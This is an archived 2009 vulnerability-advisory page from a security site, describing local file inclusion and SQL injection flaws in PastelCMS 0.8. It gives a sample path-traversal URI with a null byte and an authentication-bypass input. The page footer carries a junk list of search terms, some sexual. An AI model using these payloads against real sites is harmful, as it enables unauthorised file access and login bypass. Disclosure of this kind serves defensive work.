about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PastelCMS Local File Include and SQL Injection Vulnerabilities


Title PastelCMS Local File Include and SQL Injection Vulnerabilities
Published 2009-04-21-12:00AM
Updated 2009-04-23-04:36PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  SirGod
Vulnerable  PastelCMS PastelCMS 0.8
Not Vulnerable  
Code  Attackers can exploit these issues via a browser.The following example URI is available for the local file-include issue:http://www.example.com/[path]/?set_lng=../../../../../../BOOTSECT.BAK%00The following example data is available for the SQL-injection issue:Username : [REAL ADMIN USERNAME HERE] ' or ' 1=1
Password : anything
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 07:38:43 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.zbjiao Www.tube8. Sex iran Ww.21.sex. news for c mambo Remo php-nuke 2 IPB+2.3.2+ tamil girl tirisha se /wamp_dir/ Jjt KAREENA K mod_auth_a ircd pornopic Video seka exim4 4.63 boonex CMS is Fre alexa.xuew 200+%252Fc 200 /compo maxcpm.inf 200 /compo www.trish sexxl cross site Microsoft www.szpc31 php-nuke+2 sexy hot v www.pbxoa. 777733 cctv deale 200 /compo Tamilanweb freesex mo 100000why. www.nxrent www.bigora kernel 2.6 Crack+Data www.jl999. Naked roma Crack Data SED.VEDIO SANIA Sexpic.com